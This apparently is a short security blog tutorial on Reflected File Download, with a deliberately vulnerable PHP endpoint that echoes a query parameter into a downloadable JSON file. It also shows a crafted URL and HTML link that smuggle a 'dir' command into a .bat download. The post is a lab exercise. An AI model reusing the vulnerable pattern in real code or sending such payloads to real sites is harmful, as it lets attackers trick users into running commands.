I am sure you have now heard about Reflected File Download (RFD) [1, 2]. I wanted to setup a server to play around with what this would look like.

First we need a JSON system which will reflect user based requests. This was achieved in Kali (assumed here with the IP address: xxx.xxx.xxx.xxx) by setting up a file, called index.php , with the following code in the folder in /var/www/s/
<?php
class testdata{
        Public $data1 = "";
        Public $data2 = "";
        Public $data3 = "";
        Public $url_search = "";
}
$data_ = new testdata();
$data_-> data1 = "foo";
$data_-> data2 = "bar";
$data_->url_search = $_GET['url_search'];
//header("Content-type : application/json;");
header("Content-Disposition: attachment;");
echo json_encode($data_);
?>
If the code does not run try to set it to execute and set the correct owner :
chmod +x index.php
chown www-data:www-data index.php
Once the webpage is returning back a file it should be working correctly. Ideally what should be in the file returned is the JSON request. My tests did not manage to make use of the semicolon (;). Apache2 logs kept saying that the file /s; was not found. This means everything after the semicolon was ignored, but it was included in the request causing problems. I found that just providing the file name after the index.php seems to work in Firefox.  

Now try injecting the command you desire.
http://xxx.xxx.xxx.xxx/s/index.php/test.bat?url_search=%22||dir%3ew||
This was tested on IE6 in Win XPSp2, Mac OSX Chrome Version 38.0.2125.111 and Firefox 33.0.2. The above link only worked for Firefox 33.0.2.

As described in the document [2] it is also possible to set the system to enable a link that will download the file instead of showing the results in the page. This can be tested with the following saved in a page called index2.php and by commenting out header("Content-Disposition: attachment;"); with // .

<a download="" href="http://xxx.xxx.xxx.xxx/s/index.php/test.bat?url_search=%22||dir%3ew||">hello</a>
This is very reliant on the type of browser which all have different reactions when sending the request. The point of this post is to get everyone trying out the attack vector.

Happy testing!

References:
[1] - Spiderlabs.com - Reflected File Download - A New Web Attack Vector - http://blog.spiderlabs.com/2014/10/reflected-file-download-the-white-paper.html
[2] - White paper "Reflected File Download: A New Web Attack Vector" by Oren Hafif [Hosted on Google Drive] - https://drive.google.com/file/d/0B0KLoHg_gR_XQnV4RVhlNl96MHM/view